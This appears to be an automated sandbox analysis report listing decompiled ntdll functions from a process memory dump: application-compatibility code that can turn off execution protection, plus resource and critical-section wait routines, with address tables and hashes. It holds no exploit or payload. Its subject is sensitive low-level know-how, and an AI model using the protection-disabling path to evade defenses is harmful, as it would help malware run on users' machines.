                                                0x01f51b63
                                                0x00000000
                                                0x01f08960
                                                0x01f08969
                                                0x01f08973
                                                0x01f08976
                                                0x01f08979
                                                0x01f0897e
                                                0x01f08981
                                                0x01f08981
                                                0x01f08986
                                                0x00000000
                                                0x00000000
                                                0x01f51b6e
                                                0x01f51b74
                                                0x01f51b7b
                                                0x01f51b8f
                                                0x01f51b91
                                                0x01f51b91
                                                0x01f51b99
                                                0x01f51b9c
                                                0x01f51ba2
                                                0x01f51ba2
                                                0x01f0898c
                                                0x01f08992
                                                0x01f08999
                                                0x01f089ad
                                                0x01f51ba8
                                                0x01f51ba8
                                                0x01f089ad
                                                0x01f089b6
                                                0x01f089c8
                                                0x01f089cd
                                                0x01f089d0
                                                0x01f089d0
                                                0x01f089d6
                                                0x01f089e8
                                                0x01f089e8
                                                0x01f089ed
                                                0x00000000
                                                0x01f089ed
                                                0x01f0895a
                                                0x01f0883e
                                                0x01f08841
                                                0x01f08844
                                                0x01f08845
                                                0x01f08848
                                                0x01f0884d
                                                0x01f08852
                                                0x01f08b49
                                                0x01f08858
                                                0x01f0886c
                                                0x01f0886c
                                                0x01f08872
                                                0x01f51b0e
                                                0x00000000
                                                0x01f08878
                                                0x01f08881
                                                0x01f0888b
                                                0x01f0888e
                                                0x01f08891
                                                0x01f08896
                                                0x01f08899
                                                0x01f08899
                                                0x01f0889e
                                                0x00000000
                                                0x00000000
                                                0x01f51b21
                                                0x01f51b27
                                                0x01f51b2e
                                                0x01f51b42
                                                0x01f51b44
                                                0x01f51b44
                                                0x01f51b4c
                                                0x01f51b4f
                                                0x01f51b55
                                                0x01f51b55
                                                0x01f088a4
                                                0x01f088aa
                                                0x01f088b1
                                                0x01f088c5
                                                0x01f51b5b
                                                0x01f51b5b
                                                0x01f088c5
                                                0x01f088ce
                                                0x01f088e0
                                                0x01f088e5
                                                0x01f088e8
                                                0x01f088e8
                                                0x01f088ee
                                                0x01f08900
                                                0x01f08900
                                                0x01f08905
                                                0x00000000
                                                0x01f08905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Number-Allowed, xrefs: 01F087E6
                                                • Kernel-MUI-Language-Allowed, xrefs: 01F08827
                                                • WindowsExcludedProcs, xrefs: 01F087C1
                                                • Kernel-MUI-Language-Disallowed, xrefs: 01F08914
                                                • Kernel-MUI-Language-SKU, xrefs: 01F089FC
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: d82ef24d46757398d74ea8c15200f67d6999b24d9c5c4516f41c4e80577d66a1
                                                • Instruction ID: 1fff664a8a92b15addf44dca3aee80c5cb78a56f2ea97501dd66411d99482522
                                                • Opcode Fuzzy Hash: d82ef24d46757398d74ea8c15200f67d6999b24d9c5c4516f41c4e80577d66a1
                                                • Instruction Fuzzy Hash: 14F12BB2D0024AEFCF52DF98C9849EEBBF8FF08300F15546AE605A7251E731AA41DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01F17EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E01F17EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x1fc2088; // 0x76a512a7
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01F17F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01F33F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01EEDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x1fc4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01F33F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01EF0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01F33F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01EF8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01F33F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01F5E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01F33F92();
					_t38 = 1;
					L2:
					return E01EEE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x01f17f08
                                                0x01f17f0f
                                                0x01f17f12
                                                0x01f17f1b
                                                0x01f17f31
                                                0x01f33ead
                                                0x01f33eb4
                                                0x00000000
                                                0x00000000
                                                0x01f33eba
                                                0x01f33ecd
                                                0x01f33ed2
                                                0x01f33ee1
                                                0x01f33ee7
                                                0x01f33eec
                                                0x01f33f12
                                                0x01f33f18
                                                0x01f33f1a
                                                0x00000000
                                                0x00000000
                                                0x01f33f20
                                                0x01f33f26
                                                0x01f33f28
                                                0x00000000
                                                0x00000000
                                                0x01f33f2e
                                                0x01f33f30
                                                0x00000000
                                                0x00000000
                                                0x01f33f3a
                                                0x01f33f3b
                                                0x01f33f53
                                                0x01f33f64
                                                0x01f33f69
                                                0x01f33f6c
                                                0x01f33f6d
                                                0x01f33f6f
                                                0x01f3e304
                                                0x01f3e30f
                                                0x01f3e315
                                                0x01f3e31e
                                                0x01f3e321
                                                0x01f3e327
                                                0x01f3e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01f3e32f
                                                0x01f3e32f
                                                0x01f3e337
                                                0x01f3e33a
                                                0x01f3e33b
                                                0x01f3e33d
                                                0x01f3e33f
                                                0x01f3e341
                                                0x01f3e341
                                                0x01f3e34e
                                                0x01f3e353
                                                0x01f3e358
                                                0x01f3e35d
                                                0x01f3e35f
                                                0x00000000
                                                0x00000000
                                                0x01f3e365
                                                0x01f3e365
                                                0x01f3e368
                                                0x01f3e36e
                                                0x00000000
                                                0x00000000
                                                0x01f3e374
                                                0x01f3e32f
                                                0x01f33f75
                                                0x01f33f7a
                                                0x01f33f7c
                                                0x01f33f7e
                                                0x01f33f86
                                                0x01f17f39
                                                0x01f17f47
                                                0x01f17f47
                                                0x01f17f37
                                                0x01f17f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F33F12
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F3E345
                                                • ExecuteOptions, xrefs: 01F33F04
                                                • Execute=1, xrefs: 01F33F5E
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F33EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F3E2FB
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F33F75
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F33F4A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: dd3548102399822414c88c05d2604e30f055773256226ec9e077ab1a1121f223
                                                • Instruction ID: 29f11cbbef3b9749a65e08b78eb2cfbe1bda6bae38089a2e6a39fd06144d5357
                                                • Opcode Fuzzy Hash: dd3548102399822414c88c05d2604e30f055773256226ec9e077ab1a1121f223
                                                • Instruction Fuzzy Hash: E941D971A8021DBADB20EE94DC89FDF73FCAF54700F0005A9A609E6085E771DA46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01F053A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E01F053A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01fc01c0;
									_push(_t92);
									_push(0);
									_t37 = E01EDF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01F24FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01F33F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01F33F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01F6217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01F33F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01F23915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01F05384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01EDF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01F23915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01EDF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01F23915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01EDF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01F23915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E01F05329(_t74, _t92);
													_push(1);
													return E01F053A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                0x01f053ab
                                                0x01f053ae
                                                0x01f053b1
                                                0x01f053b4
                                                0x01f053b7
                                                0x01f205b6
                                                0x01f205c0
                                                0x01f205c3
                                                0x00000000
                                                0x01f205c9
                                                0x01f205c9
                                                0x01f205cc
                                                0x01f205d5
                                                0x01f205d5
                                                0x01f053bd
                                                0x01f053bd
                                                0x01f053bd
                                                0x01f053be
                                                0x01f053be
                                                0x01f053be
                                                0x01f053c0
                                                0x00000000
                                                0x00000000
                                                0x01f42269
                                                0x01f4226d
                                                0x01f42349
                                                0x01f4234d
                                                0x01f42273
                                                0x01f42276
                                                0x01f42279
                                                0x01f4227e
                                                0x01f42283
                                                0x01f42287
                                                0x01f4228a
                                                0x01f4228d
                                                0x01f4228f
                                                0x01f422bc
                                                0x01f422bc
                                                0x01f422bc
                                                0x01f422be
                                                0x01f422c4
                                                0x01f422cc
                                                0x01f422d0
                                                0x01f422d6
                                                0x01f422d7
                                                0x01f422da
                                                0x01f422df
                                                0x01f422e4
                                                0x00000000
                                                0x00000000
                                                0x01f422e6
                                                0x01f422e9
                                                0x01f422f4
                                                0x01f422f9
                                                0x01f422fa
                                                0x01f42305
                                                0x01f42314
                                                0x01f42319
                                                0x01f4231a
                                                0x01f4231d
                                                0x01f42320
                                                0x01f42323
                                                0x01f42323
                                                0x01f42328
                                                0x01f4232d
                                                0x01f4232f
                                                0x01f42331
                                                0x01f42336
                                                0x01f42336
                                                0x01f4233b
                                                0x01f4233d
                                                0x01f42350
                                                0x01f42351
                                                0x01f42356
                                                0x01f42359
                                                0x01f42359
                                                0x01f4235b
                                                0x01f4235d
                                                0x01f05367
                                                0x01f0536b
                                                0x01f05372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01f42363
                                                0x01f42363
                                                0x01f42369
                                                0x01f4236a
                                                0x01f4236c
                                                0x01f42371
                                                0x01f42373
                                                0x00000000
                                                0x01f42379
                                                0x01f42379
                                                0x01f4237a
                                                0x01f4237f
                                                0x01f4237f
                                                0x01f42385
                                                0x01f42386
                                                0x01f42389
                                                0x01f4238e
                                                0x01f42390
                                                0x01f05378
                                                0x01f0537c
                                                0x01f42396
                                                0x01f42396
                                                0x01f42397
                                                0x01f4239c
                                                0x01f423a2
                                                0x01f423a3
                                                0x01f423a6
                                                0x01f423ab
                                                0x01f423ad
                                                0x00000000
                                                0x01f423b3
                                                0x01f423b3
                                                0x01f423b4
                                                0x01f423b9
                                                0x01f423ba
                                                0x01f423ba
                                                0x01f423bc
                                                0x01f423bf
                                                0x00000000
                                                0x00000000
                                                0x01f39153
                                                0x01f39158
                                                0x01f3915a
                                                0x01f3915e
                                                0x01f39160
                                                0x00000000
                                                0x01f39166
                                                0x01f39166
                                                0x01f39171
                                                0x01f39176
                                                0x01f39176
                                                0x00000000
                                                0x01f39160
                                                0x01f423c6
                                                0x01f423cb
                                                0x01f423d7
                                                0x01f423d7
                                                0x01f423ad
                                                0x01f42390
                                                0x01f42373
                                                0x01f4233f
                                                0x01f4233f
                                                0x00000000
                                                0x01f4233f
                                                0x01f42291
                                                0x01f42291
                                                0x01f42293
                                                0x01f42295
                                                0x01f4229a
                                                0x01f422a1
                                                0x01f422a3
                                                0x01f422a7
                                                0x01f422a9
                                                0x00000000
                                                0x00000000
                                                0x01f422ab
                                                0x01f422ad
                                                0x01f422af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01f422af
                                                0x01f422b1
                                                0x01f422b4
                                                0x01f422b4
                                                0x01f422b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01f422b6
                                                0x01f4228f
                                                0x00000000
                                                0x01f4226d
                                                0x01f053cb
                                                0x01f053ce
                                                0x01f053d0
                                                0x01f053d4
                                                0x01f053d6
                                                0x00000000
                                                0x01f053d8
                                                0x01f053e3
                                                0x01f053ea
                                                0x01f053ea
                                                0x01f053d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F422F4
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 01F42328
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F422FC
                                                • RTL: Resource at %p, xrefs: 01F4230B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: dd79e0a3ef876f14f013e40fb3da89c0055c6abf0e92e41c368a5120a637aeb5
                                                • Instruction ID: ff5da73727d34c84ab35edcfad5c472bb18173b8833a0b6a7d96a7d3fffd92fc
                                                • Opcode Fuzzy Hash: dd79e0a3ef876f14f013e40fb3da89c0055c6abf0e92e41c368a5120a637aeb5
                                                • Instruction Fuzzy Hash: 39512E71B00716ABEB16DF68DC80FAA77DDEF54310F104229FD45DB281E6A3D9428B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01F0EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E01F0EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01EFDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x1fc793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01EE16C0(_t39);
				} else {
					_t40 = E01EDF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01F23915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01EE01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x1fc793c; // 0x0
								_push(_t85);
								_t44 = E01EE1F28(_t71);
							} else {
								_t44 = E01EDF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01F23915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01F62306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01F0EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01F24FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01F33F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01F33F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x1fc20c0;
								if(_t85 != 0x1fc20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01F6217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01F33F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x01f0ec56
                                                0x01f0ec56
                                                0x01f0ec56
                                                0x01f0ec5c
                                                0x01f0ec64
                                                0x01f423e6
                                                0x01f423eb
                                                0x01f423eb
                                                0x01f0ec6a
                                                0x01f0ec6c
                                                0x01f0ec6f
                                                0x01f423f3
                                                0x01f423f8
                                                0x01f423fa
                                                0x01f423fc
                                                0x01f0ec75
                                                0x01f0ec76
                                                0x01f0ec76
                                                0x01f0ec7b
                                                0x01f0ec7c
                                                0x01f0ec7e
                                                0x01f42406
                                                0x01f42407
                                                0x01f4240c
                                                0x01f4240d
                                                0x01f4240d
                                                0x01f4240d
                                                0x01f42414
                                                0x01f42417
                                                0x01f4241e
                                                0x01f42435
                                                0x01f42438
                                                0x01f4243c
                                                0x01f4243f
                                                0x01f42442
                                                0x01f42443
                                                0x01f42446
                                                0x01f42449
                                                0x01f42453
                                                0x01f42455
                                                0x01f4245b
                                                0x01f4245b
                                                0x01f0eb99
                                                0x01f0eb99
                                                0x01f0eb9c
                                                0x01f0eb9d
                                                0x01f0eb9f
                                                0x01f0eba2
                                                0x01f42465
                                                0x01f4246b
                                                0x01f4246d
                                                0x01f0eba8
                                                0x01f0eba9
                                                0x01f0eba9
                                                0x01f0ebae
                                                0x01f0ebb3
                                                0x01f0ebb9
                                                0x01f0ebbb
                                                0x01f42513
                                                0x01f42514
                                                0x01f42519
                                                0x01f4251b
                                                0x01f0ec2a
                                                0x01f0ec2d
                                                0x01f0ec33
                                                0x01f0ec36
                                                0x01f0ec3a
                                                0x01f0ec3e
                                                0x01f0ec40
                                                0x01f0ec47
                                                0x01f0ec47
                                                0x01f0ec40
                                                0x01ee22c6
                                                0x01f0ebc1
                                                0x01f0ebc1
                                                0x01f0ebc5
